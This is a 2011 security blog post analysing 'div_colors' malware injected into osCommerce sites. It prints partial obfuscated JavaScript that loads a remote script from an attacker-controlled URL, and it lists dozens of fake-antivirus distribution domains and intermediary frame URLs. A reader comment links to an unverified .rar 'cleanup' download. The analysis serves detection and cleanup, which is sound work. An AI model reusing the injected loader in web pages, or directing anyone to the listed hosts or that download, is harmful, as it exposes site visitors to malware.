• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
  • Immediate Help
  • Login
  • Languages
    • English
    • Spanish
    • Portuguese

The “div_colors” Malware Update

March 29, 2011David Dede

0
SHARES
FacebookTwitterSubscribe

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


As you can see, it looks like a valid JavaScript and that’s what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

var new_cstyle=document.createElement("script”);
new_cstyle..type="text/javascript”;
new_cstyle..src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head”)[0]. appendChild(new_cstyle);

Where is it lloading the malicious code from?

Right now, it is loading from http://tongho.co.th/engine/, but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of the some of the domains used so far:

http://tongho.co.th/engine/
againstvirusxpsoft.com
antiagencyxpsoft.com
antivirixpsoft.com
antivirusxpeasy.com
antivirusxphard.com
antivirusxpinfected.com
antivirusxpsoftcentral.com
antivirusxpsoft.com
antivirusxpsoftonline.com
egyptantivirusxp.com
infectedvirusxpsoft.com
myantivirusxpsoft.com
myxpscanantivirus.com
protestersantivirusxp.com
protestersantivirusxpsoft.com
protesterscanantivirus.com
protesterscanantivirusxp.com
protestersscanantivirus.com
protestersvirusxpsoft.com
scanantivirixp.com
theantivirusxpsoft.com
thexpscanantivirus.com
webantivirusxpsoft.com
webxpscanantivirus.com
xpexamineantivirus.com
xpscanagainstvirus.com
xpscanantiagency.com
xpscanantibacteria.com
xpscanantiviri.com
xpscanantiviruscentral.com
xpscanantivirus.com
xpscanantivirusonline.com
xpscanantivirusprotesters.com
xpscanwarvirus.com
xpseeantivirus.com

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

<frame src ="http://86.55.140.203/index2.php" ..
<frame src="http://solomon-vl.cz.cc/show.php?key=fcfe7c10d4f05fa29b45456408269fdc&u=..

It’s a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our security scanner to verify if a site is infected. If it is, we can take care of it for you.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, osCommerce Security, Website Blacklist

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. jeremy

    March 30, 2011

    I got infected… I was able to fix the pages with SED. Does anyone know where these ‘backdoors’ are?? I want to make sure this doesn’t happen again.

    • Jonathan

      April 2, 2011

      Hi Jeremy. My site hot infected also… Have you found what caused it?

  2. David Psd Xhtml

    April 7, 2011

    Thousand sites with this malware… webmasters headache

  3. Ehaba

    May 15, 2011

    I write small program that delete mallware code from all js scripts. The PHP script also delete one more type mallware and set mask read only for each file on server with need extension.
    Link for download http://tablichki.kiev.ua/r.rar

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Sucuri website security

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2018 Sucuri Inc. All rights reserved